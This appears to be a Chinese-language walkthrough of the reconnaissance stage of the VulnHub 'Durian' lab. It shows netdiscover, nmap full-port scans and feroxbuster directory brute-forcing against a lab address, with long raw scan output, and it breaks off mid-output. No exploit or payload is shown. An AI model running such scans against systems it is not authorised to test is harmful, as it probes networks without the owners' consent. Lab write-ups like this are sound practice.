一、靶場準備

??????? 下載地址：http://www.vulnhub.com/entry/durian-1,553/

??????? 更改網絡模式

????????

二、練習過程

??????? 1、使用kali進行探測，探測到192.168.174.138地址

????????netdiscover -r 192.168.174.0/24

????????

??????? 2、使用kali對192.168.174.138進行端口探測，發現8000為nginx 1.14.2、7080為LiteSpeed、8088為LiteSpeed,7080為后臺，8088為前臺，8000代理8088

????????nmap -sC -sV -p- 192.168.174.138 -n -vv --min-rate=2000???????

?PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 28:1c:64:fa:9c:c3:d2:d4:bb:76:3d:3b:10:e2:b1:25 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDcIoZ27ulKq07HoP1IAw+p+ngZIw9E1wu2RSr/iVSr8jF8avZE4uJPET1cjydV6nBG5RPzhakghCPmAAukzctDBhPn5bMgWPMCVOv5DisAIldp6H44iQJWYsAAMxbgurBxfwLVVIeL2xyCxwK70G59QtOjCCLPIcoXo2MtNn2IC5rgLYY2UgL0SeNfblLkKKMscxAQgKZ6dh63aFT+j6Y0WHxn+N5uaySNG7CPxamddeKHNwoSdC1FZuMfAPRGGqDfH4OHAtu5/zYDWgP/BLheBalHR/TP8KYC1hDhbI+5fLCykSTT7Q8qXI9XtqfYnYoGwF5XqQX0ljw1ue9zKPhF | 256 da:b2:e1:7f:7c:1b:58:cf:fd:4f:74:e9:23:6d:51:d7 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPCIIPNvjo5nfOTzx/1iidyta9PBBg5UviiyhuMPxZq06KZccaHk2JobdXSYzKAWlUGYDBOncFRTErBSvkRWkt0= | 256 41:e1:0c:2b:d4:26:e8:d3:71:bb:9d:f9:61:56:63:c0 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJACpKE5LO4W2cn4Y54RR9yUu93wV+fFR7CPMBLBT3AG 7080/tcp open ssl/empowerid syn-ack ttl 64 LiteSpeed | fingerprint-strings: | GetRequest: | HTTP/1.0 302 Found | x-powered-by: PHP/5.6.36 | x-frame-options: SAMEORIGIN | x-xss-protection: 1;mode=block | referrer-policy: same-origin | x-content-type-options: nosniff | set-cookie: LSUI37FE0C43B84483E0=d3b620b64038c4a2f4954c993ee0eea1; path=/; secure; HttpOnly | expires: Thu, 19 Nov 1981 08:52:00 GMT | cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 | pragma: no-cache | set-cookie: LSID37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ | set-cookie: LSPA37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ | set-cookie: LSUI37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ | location: /login.php | content-type: text/html; charset=UTF-8 | content-length: 0 | date: Wed, 14 Sep 2022 01:20:55 GMT | server: LiteSpeed | alt-svc: quic=":7080"; ma=2592000; v="43,46", h3-Q043=":7080"; | HTTPOptions: | HTTP/1.0 302 Found | x-powered-by: PHP/5.6.36 | x-frame-options: SAMEORIGIN | x-xss-protection: 1;mode=block | referrer-policy: same-origin | x-content-type-options: nosniff | set-cookie: LSUI37FE0C43B84483E0=9f3792960e7814d08da02910250cf89b; path=/; secure; HttpOnly | expires: Thu, 19 Nov 1981 08:52:00 GMT | cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 | pragma: no-cache | set-cookie: LSID37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ | set-cookie: LSPA37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ | set-cookie: LSUI37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ | location: /login.php | content-type: text/html; charset=UTF-8 | content-length: 0 | date: Wed, 14 Sep 2022 01:20:55 GMT | server: LiteSpeed |_ alt-svc: quic=":7080"; ma=2592000; v="43,46", h3-Q043=":7080"; |_http-favicon: Unknown favicon MD5: AF89068FFB9883F7D99BB25F75687AC7 | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-title: Did not follow redirect to https://192.168.174.138:7080/login.php | ssl-cert: Subject: commonName=durian/organizationName=LiteSpeedCommunity/stateOrProvinceName=NJ/countryName=US/organizationalUnitName=Testing/initials=CP/dnQualifier=openlitespeed/localityName=Virtual/name=openlitespeed/emailAddress=mail@durian | Issuer: commonName=durian/organizationName=LiteSpeedCommunity/stateOrProvinceName=NJ/countryName=US/organizationalUnitName=Testing/initials=CP/dnQualifier=openlitespeed/localityName=Virtual/name=openlitespeed/emailAddress=mail@durian | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2020-09-08T02:05:32 | Not valid after: 2022-12-07T02:05:32 | MD5: 9009 c3b8 8777 9a53 9b56 2556 30ee 0e9c | SHA-1: ab6e 1ab5 d06d 506c c588 d946 b97a c0fd 89f1 5605 | -----BEGIN CERTIFICATE----- | MIIEMTCCAxmgAwIBAgIUIE+NkC48iwucp8CENgLvUcYH84swDQYJKoZIhvcNAQEL | BQAwgcUxDzANBgNVBAMMBmR1cmlhbjELMAkGA1UEBhMCVVMxEDAOBgNVBAcMB1Zp | cnR1YWwxGzAZBgNVBAoMEkxpdGVTcGVlZENvbW11bml0eTEQMA4GA1UECwwHVGVz | dGluZzELMAkGA1UECAwCTkoxGjAYBgkqhkiG9w0BCQEWC21haWxAZHVyaWFuMRYw | FAYDVQQpDA1vcGVubGl0ZXNwZWVkMQswCQYDVQQrDAJDUDEWMBQGA1UELhMNb3Bl | bmxpdGVzcGVlZDAeFw0yMDA5MDgwMjA1MzJaFw0yMjEyMDcwMjA1MzJaMIHFMQ8w | DQYDVQQDDAZkdXJpYW4xCzAJBgNVBAYTAlVTMRAwDgYDVQQHDAdWaXJ0dWFsMRsw | GQYDVQQKDBJMaXRlU3BlZWRDb21tdW5pdHkxEDAOBgNVBAsMB1Rlc3RpbmcxCzAJ | BgNVBAgMAk5KMRowGAYJKoZIhvcNAQkBFgttYWlsQGR1cmlhbjEWMBQGA1UEKQwN | b3BlbmxpdGVzcGVlZDELMAkGA1UEKwwCQ1AxFjAUBgNVBC4TDW9wZW5saXRlc3Bl | ZWQwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCdqKu/8xCP8hH62rXJ | PIoL9a+rtHe3HL1bNH3/pDOa7zCcWsEjcpYvl3sVTM3AuqCx1+RMJBKmLAaF8liy | /eTvs2MLkpLr1zkv+jj3iEMvv9cyMtOJfk10PkBMKYiSffPMwELRHeT2x2tgTY2/ | toDBP8zQeVj8wm8svelG4bFRv8/bIsktJvZDy56nzFmXXjxiO9qBbKlUWLJHRtmT | H+8whDiiGF55wY8pKJbJNlJa64RnfXxA004zEgmuDnYLPDj+tp2cvEvOZG+TAlTa | 47FmZL2MkamPTveOB4ZXH+KN2gedEaZqIumb0tXrjahlI6Ukuh45lhz1BUxlriCa | qPbxAgMBAAGjFzAVMBMGA1UdJQQMMAoGCCsGAQUFBwMBMA0GCSqGSIb3DQEBCwUA | A4IBAQAlOatyhOSya2XaAK+fAOrjMFT0iF7ekKKRnzwwNJUP50vF9mTMsj8l1Gb4 | rNn545bmtOuGE2GP9BUYyy+dw0NmUVyWBfyJmzZDbosSftwlTU7jJ8V3sM20MaxO | 1x4181lTv9ROJrrDGrye+Sf2MOahrh5iZ+Mq/LZKZ04MTw7iYRNGgkCIbKISmafa | qqja3MokTaIdQBf+oCxX7JiR0Jd6YMdmux5p1/xSEuq8GnPgM8mRZiLSkZYOrwB9 | HJhCswI5T79RSJVIrpRbR7g9h1vc+yDDu/SH49g5SGyE/e2YdDRuA/JVyMUKZFBt | wSErKwtEdoJosbega14/Vpe9uKIr |_-----END CERTIFICATE----- |_http-server-header: LiteSpeed | tls-alpn: | h2 | spdy/3 | spdy/2 |_ http/1.1 |_ssl-date: TLS randomness does not represent time 8000/tcp open http syn-ack ttl 64 nginx 1.14.2 | http-methods: |_ Supported Methods: GET HEAD |_http-title: Durian |_http-open-proxy: Proxy might be redirecting requests |_http-server-header: nginx/1.14.2 8088/tcp open radan-http syn-ack ttl 64 LiteSpeed | fingerprint-strings: | GetRequest: | HTTP/1.0 200 OK | etag: "2fd-5f56ea13-40590;;;" | last-modified: Tue, 08 Sep 2020 02:18:59 GMT | content-type: text/html | content-length: 765 | accept-ranges: bytes | date: Wed, 14 Sep 2022 01:20:39 GMT | server: LiteSpeed | connection: close | <html> | <body bgcolor="white"> | <head> | <title>Durian</title> | <meta name="description" content="We Are Still Alive!"> | <meta name="keywords" content="Hacked by Ind_C0d3r"> | <meta name="robots" content="index, follow"> | <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> | <meta name="language" content="English"> | </head> | <link href="https://fonts.googleapis.com/css?family=Righteous|Saira+Stencil+One&display=swap" rel="stylesheet"> | <style type="text/css"> | @font-face { | font-family: 'Righteous', cursive; | font-family: 'Saira Stencil One', cursive; | </style> | <center><br><br> | <img src="https://www.producemarketguide.com/sites/default/files/Commoditi | Socks5: | HTTP/1.1 400 Bad Request | content-type: text/html | cache-control: private, no-cache, max-age=0 | pragma: no-cache | content-length: 1209 | date: Wed, 14 Sep 2022 01:20:39 GMT | server: LiteSpeed | connection: close | <!DOCTYPE html> | <html style="height:100%"> | <head> | <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> | <title> 400 Bad Request | </title></head> | <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"> | <div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> | style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1> | style="margin-top:20px;font-size: 30px;">Bad Request | </h2> | <p>It is not a valid request!</p> |_ </div></div><div style="color:#f0f0 |_http-title: Durian | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: LiteSpeed[點擊并拖拽以移動] ?

??????? 3、查看192.168.174.138的8000、7080端口進行查看

????????

????????

??????? 4、kali下載feroxbuster工具

???????

??????? 5、使用feroxbuster對192.168.174.138:8088目錄進行探測

????????feroxbuster -u http://192.168.174.138:8088/???????

🏁 Press [ENTER] to use the Scan Management Menu? ────────────────────────────────────────────────── 301 GET 14l 109w 1260c http://192.168.174.138:8088/css => http://192.168.174.138:8088/css/ 301 GET 14l 109w 1260c http://192.168.174.138:8088/cgi-bin => http://192.168.174.138:8088/cgi-bin/ 301 GET 14l 109w 1260c http://192.168.174.138:8088/img => http://192.168.174.138:8088/img/ 200 GET 20l 51w 765c http://192.168.174.138:8088/ 301 GET 14l 109w 1260c http://192.168.174.138:8088/docs => http://192.168.174.138:8088/docs/ 301 GET 14l 109w 1260c http://192.168.174.138:8088/docs/css => http://192.168.174.138:8088/docs/css/ 301 GET 14l 109w 1260c http://192.168.174.138:8088/docs/img => http://192.168.174.138:8088/docs/img/ 301 GET 14l 109w 1260c http://192.168.174.138:8088/docs/zh-CN => http://192.168.174.138:8088/docs/zh-CN/ 301 GET 14l 109w 1260c http://192.168.174.138:8088/protected => http://192.168.174.138:8088/protected/ WLD GET 14l 106w 1242c Got 401 for http://192.168.174.138:8088/protected/c5aa00b136ec4fb79681a69cdabf3398 (url length: 32) WLD GET - - - Wildcard response is static; auto-filtering 1242 responses; toggle this behavior by using --dont-filter 301 GET 14l 109w 1260c http://192.168.174.138:8088/blocked => http://192.168.174.138:8088/blocked/ WLD GET 14l 107w 1227c Got 403 for http://192.168.174.138:8088/blocked/db204517c8d8433ca218ff7793d902f2 (url length: 32) WLD GET - - - Wildcard response is static; auto-filtering 1227 responses; toggle this behavior by using --dont-filter WLD GET 14l 107w 1227c Got 403 for http://192.168.174.138:8088/blocked/b52a1d0522674faeb005d23944a2ed0aeaa4dd719ed04ac8b4903b23f208c3c88df

??????? 6、使用feroxbuster對192.168.174.138:8000目錄進行探測

feroxbuster -u http://192.168.174.138:8000/

───────────────────────────┴──────────────────────🏁 Press [ENTER] to use the Scan Management Menu? ────────────────────────────────────────────────── 200 GET 20l 51w 765c http://192.168.174.138:8000/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog => http://192.168.174.138:8000/blog/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-content => http://192.168.174.138:8000/blog/wp-content/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-admin => http://192.168.174.138:8000/blog/wp-admin/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes => http://192.168.174.138:8000/blog/wp-includes/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/js => http://192.168.174.138:8000/blog/wp-includes/js/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/images => http://192.168.174.138:8000/blog/wp-includes/images/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-admin/js => http://192.168.174.138:8000/blog/wp-admin/js/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/css => http://192.168.174.138:8000/blog/wp-includes/css/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-admin/includes => http://192.168.174.138:8000/blog/wp-admin/includes/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-admin/images => http://192.168.174.138:8000/blog/wp-admin/images/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-admin/css => http://192.168.174.138:8000/blog/wp-admin/css/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-admin/user => http://192.168.174.138:8000/blog/wp-admin/user/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-content/themes => http://192.168.174.138:8000/blog/wp-content/themes/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-content/plugins => http://192.168.174.138:8000/blog/wp-content/plugins/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/assets => http://192.168.174.138:8000/blog/wp-includes/assets/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-content/uploads => http://192.168.174.138:8000/blog/wp-content/uploads/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/blocks => http://192.168.174.138:8000/blog/wp-includes/blocks/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/images/media => http://192.168.174.138:8000/blog/wp-includes/images/media/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/blocks/search => http://192.168.174.138:8000/blog/wp-includes/blocks/search/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/blocks/rss => http://192.168.174.138:8000/blog/wp-includes/blocks/rss/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/blocks/archives => http://192.168.174.138:8000/blog/wp-includes/blocks/archives/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/fonts => http://192.168.174.138:8000/blog/wp-includes/fonts/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/blocks/gallery => http://192.168.174.138:8000/blog/wp-includes/blocks/gallery/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/blocks/video => http://192.168.174.138:8000/blog/wp-includes/blocks/video/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/blocks/html => http://192.168.174.138:8000/blog/wp-includes/blocks/html/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/customize => http://192.168.174.138:8000/blog/wp-includes/customize/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/blocks/calendar => http://192.168.174.138:8000/blog/wp-includes/blocks/calendar/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/blocks/image => http://192.168.174.138:8000/blog/wp-includes/blocks/image/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/blocks/audio => http://192.168.174.138:8000/blog/wp-includes/blocks/audio/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/widgets => http://192.168.174.138:8000/blog/wp-includes/widgets/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/blocks/code => http://192.168.174.138:8000/blog/wp-includes/blocks/code/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/blocks/file => http://192.168.174.138:8000/blog/wp-includes/blocks/file/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-admin/js/widgets => http://192.168.174.138:8000/blog/wp-admin/js/widgets/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/blocks/list => http://192.168.174.138:8000/blog/wp-includes/blocks/list/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/js/tinymce => http://192.168.174.138:8000/blog/wp-includes/js/tinymce/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/blocks/buttons => http://192.168.174.138:8000/blog/wp-includes/blocks/buttons/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/blocks/group => http://192.168.174.138:8000/blog/wp-includes/blocks/group/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/js/jquery => http://192.168.174.138:8000/blog/wp-includes/js/jquery/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/blocks/categories => http://192.168.174.138:8000/blog/wp-includes/blocks/categories/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/blocks/block => http://192.168.174.138:8000/blog/wp-includes/blocks/block/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-admin/network => http://192.168.174.138:8000/blog/wp-admin/network/ 301 GET 7l 12w 185c http://192.168.174.138:8000/cgi-data => http://192.168.174.138:8000/cgi-data/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/sitemaps => http://192.168.174.138:8000/blog/wp-includes/sitemaps/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-admin/maint => http://192.168.174.138:8000/blog/wp-admin/maint/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/blocks/quote => http://192.168.174.138:8000/blog/wp-includes/blocks/quote/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/js/dist => http://192.168.174.138:8000/blog/wp-includes/js/dist/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/css/dist => http://192.168.174.138:8000/blog/wp-includes/css/dist/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/js/thickbox => http://192.168.174.138:8000/blog/wp-includes/js/thickbox/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/blocks/more => http://192.168.174.138:8000/blog/wp-includes/blocks/more/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/images/smilies => http://192.168.174.138:8000/blog/wp-includes/images/smilies/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/blocks/classic => http://192.168.174.138:8000/blog/wp-includes/blocks/classic/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/blocks/table => http://192.168.174.138:8000/blog/wp-includes/blocks/table/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/certificates => http://192.168.174.138:8000/blog/wp-includes/certificates/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-admin/css/colors => http://192.168.174.138:8000/blog/wp-admin/css/colors/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/blocks/button => http://192.168.174.138:8000/blog/wp-includes/blocks/button/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/sitemaps/providers => http://192.168.174.138:8000/blog/wp-includes/sitemaps/providers/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/blocks/columns => http://192.168.174.138:8000/blog/wp-includes/blocks/columns/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/Text => http://192.168.174.138:8000/blog/wp-includes/Text/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/js/swfupload => http://192.168.174.138:8000/blog/wp-includes/js/swfupload/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/blocks/column => http://192.168.174.138:8000/blog/wp-includes/blocks/column/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/PHPMailer => http://192.168.174.138:8000/blog/wp-includes/PHPMailer/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-content/uploads/2020 => http://192.168.174.138:8000/blog/wp-content/uploads/2020/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/js/crop => http://192.168.174.138:8000/blog/wp-includes/js/crop/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/blocks/missing => http://192.168.174.138:8000/blog/wp-includes/blocks/missing/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-content/plugins/akismet => http://192.168.174.138:8000/blog/wp-content/plugins/akismet/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/blocks/heading => http://192.168.174.138:8000/blog/wp-includes/blocks/heading/ 301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/images/crystal => http://192.168.174.138:8000/blog/wp-includes/images/crystal/ [####################] - 48s 840000/840000 0s found:68 errors:0

??????? 7、嘗試訪問80端口，發現訪問成功

????????

??????? 8、查看80端口是否存在blog文件

????????

????????

???????? 9、使用kaili探測192.168.174.138的端口重新探測發現存在了80端口

????????nmap -sC -sV -p- 192.168.174.138 -n -vv --min-rate=2000

??????? 之所以第一次探測沒有探測出80端口可能是80端口開啟失敗了重啟靶機再次探測

PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 28:1c:64:fa:9c:c3:d2:d4:bb:76:3d:3b:10:e2:b1:25 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDcIoZ27ulKq07HoP1IAw+p+ngZIw9E1wu2RSr/iVSr8jF8avZE4uJPET1cjydV6nBG5RPzhakghCPmAAukzctDBhPn5bMgWPMCVOv5DisAIldp6H44iQJWYsAAMxbgurBxfwLVVIeL2xyCxwK70G59QtOjCCLPIcoXo2MtNn2IC5rgLYY2UgL0SeNfblLkKKMscxAQgKZ6dh63aFT+j6Y0WHxn+N5uaySNG7CPxamddeKHNwoSdC1FZuMfAPRGGqDfH4OHAtu5/zYDWgP/BLheBalHR/TP8KYC1hDhbI+5fLCykSTT7Q8qXI9XtqfYnYoGwF5XqQX0ljw1ue9zKPhF | 256 da:b2:e1:7f:7c:1b:58:cf:fd:4f:74:e9:23:6d:51:d7 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPCIIPNvjo5nfOTzx/1iidyta9PBBg5UviiyhuMPxZq06KZccaHk2JobdXSYzKAWlUGYDBOncFRTErBSvkRWkt0= | 256 41:e1:0c:2b:d4:26:e8:d3:71:bb:9d:f9:61:56:63:c0 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJACpKE5LO4W2cn4Y54RR9yUu93wV+fFR7CPMBLBT3AG 80/tcp open http syn-ack ttl 64 Apache httpd 2.4.38 ((Debian)) | http-methods: |_ Supported Methods: GET POST OPTIONS HEAD |_http-title: Durian |_http-server-header: Apache/2.4.38 (Debian) 7080/tcp open ssl/empowerid syn-ack ttl 64 LiteSpeed | fingerprint-strings: | GetRequest: | HTTP/1.0 302 Found | x-powered-by: PHP/5.6.36 | x-frame-options: SAMEORIGIN | x-xss-protection: 1;mode=block | referrer-policy: same-origin | x-content-type-options: nosniff | set-cookie: LSUI37FE0C43B84483E0=9f2d3c89f7d7793d4086a226d0a0140f; path=/; secure; HttpOnly | expires: Thu, 19 Nov 1981 08:52:00 GMT | cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 | pragma: no-cache | set-cookie: LSID37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ | set-cookie: LSPA37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ | set-cookie: LSUI37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ | location: /login.php | content-type: text/html; charset=UTF-8 | content-length: 0 | date: Wed, 14 Sep 2022 03:29:38 GMT | server: LiteSpeed | alt-svc: quic=":7080"; ma=2592000; v="43,46", h3-Q043=":7080"; | HTTPOptions: | HTTP/1.0 302 Found | x-powered-by: PHP/5.6.36 | x-frame-options: SAMEORIGIN | x-xss-protection: 1;mode=block | referrer-policy: same-origin | x-content-type-options: nosniff | set-cookie: LSUI37FE0C43B84483E0=a6944b6c3fff496bb298e4467489bfd3; path=/; secure; HttpOnly | expires: Thu, 19 Nov 1981 08:52:00 GMT | cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 | pragma: no-cache | set-cookie: LSID37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ | set-cookie: LSPA37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ | set-cookie: LSUI37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ | location: /login.php | content-type: text/html; charset=UTF-8 | content-length: 0 | date: Wed, 14 Sep 2022 03:29:38 GMT | server: LiteSpeed |_ alt-svc: quic=":7080"; ma=2592000; v="43,46", h3-Q043=":7080"; |_http-favicon: Unknown favicon MD5: AF89068FFB9883F7D99BB25F75687AC7 | http-title: LiteSpeed WebAdmin Console |_Requested resource was https://192.168.174.138:7080/login.php | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS | ssl-cert: Subject: commonName=durian/organizationName=LiteSpeedCommunity/stateOrProvinceName=NJ/countryName=US/emailAddress=mail@durian/dnQualifier=openlitespeed/initials=CP/name=openlitespeed/organizationalUnitName=Testing/localityName=Virtual | Issuer: commonName=durian/organizationName=LiteSpeedCommunity/stateOrProvinceName=NJ/countryName=US/emailAddress=mail@durian/dnQualifier=openlitespeed/initials=CP/name=openlitespeed/organizationalUnitName=Testing/localityName=Virtual | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2020-09-08T02:05:32 | Not valid after: 2022-12-07T02:05:32 | MD5: 9009 c3b8 8777 9a53 9b56 2556 30ee 0e9c | SHA-1: ab6e 1ab5 d06d 506c c588 d946 b97a c0fd 89f1 5605 | -----BEGIN CERTIFICATE----- | MIIEMTCCAxmgAwIBAgIUIE+NkC48iwucp8CENgLvUcYH84swDQYJKoZIhvcNAQEL | BQAwgcUxDzANBgNVBAMMBmR1cmlhbjELMAkGA1UEBhMCVVMxEDAOBgNVBAcMB1Zp | cnR1YWwxGzAZBgNVBAoMEkxpdGVTcGVlZENvbW11bml0eTEQMA4GA1UECwwHVGVz | dGluZzELMAkGA1UECAwCTkoxGjAYBgkqhkiG9w0BCQEWC21haWxAZHVyaWFuMRYw | FAYDVQQpDA1vcGVubGl0ZXNwZWVkMQswCQYDVQQrDAJDUDEWMBQGA1UELhMNb3Bl | bmxpdGVzcGVlZDAeFw0yMDA5MDgwMjA1MzJaFw0yMjEyMDcwMjA1MzJaMIHFMQ8w | DQYDVQQDDAZkdXJpYW4xCzAJBgNVBAYTAlVTMRAwDgYDVQQHDAdWaXJ0dWFsMRsw | GQYDVQQKDBJMaXRlU3BlZWRDb21tdW5pdHkxEDAOBgNVBAsMB1Rlc3RpbmcxCzAJ | BgNVBAgMAk5KMRowGAYJKoZIhvcNAQkBFgttYWlsQGR1cmlhbjEWMBQGA1UEKQwN | b3BlbmxpdGVzcGVlZDELMAkGA1UEKwwCQ1AxFjAUBgNVBC4TDW9wZW5saXRlc3Bl | ZWQwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCdqKu/8xCP8hH62rXJ | PIoL9a+rtHe3HL1bNH3/pDOa7zCcWsEjcpYvl3sVTM3AuqCx1+RMJBKmLAaF8liy | /eTvs2MLkpLr1zkv+jj3iEMvv9cyMtOJfk10PkBMKYiSffPMwELRHeT2x2tgTY2/ | toDBP8zQeVj8wm8svelG4bFRv8/bIsktJvZDy56nzFmXXjxiO9qBbKlUWLJHRtmT | H+8whDiiGF55wY8pKJbJNlJa64RnfXxA004zEgmuDnYLPDj+tp2cvEvOZG+TAlTa | 47FmZL2MkamPTveOB4ZXH+KN2gedEaZqIumb0tXrjahlI6Ukuh45lhz1BUxlriCa | qPbxAgMBAAGjFzAVMBMGA1UdJQQMMAoGCCsGAQUFBwMBMA0GCSqGSIb3DQEBCwUA | A4IBAQAlOatyhOSya2XaAK+fAOrjMFT0iF7ekKKRnzwwNJUP50vF9mTMsj8l1Gb4 | rNn545bmtOuGE2GP9BUYyy+dw0NmUVyWBfyJmzZDbosSftwlTU7jJ8V3sM20MaxO | 1x4181lTv9ROJrrDGrye+Sf2MOahrh5iZ+Mq/LZKZ04MTw7iYRNGgkCIbKISmafa | qqja3MokTaIdQBf+oCxX7JiR0Jd6YMdmux5p1/xSEuq8GnPgM8mRZiLSkZYOrwB9 | 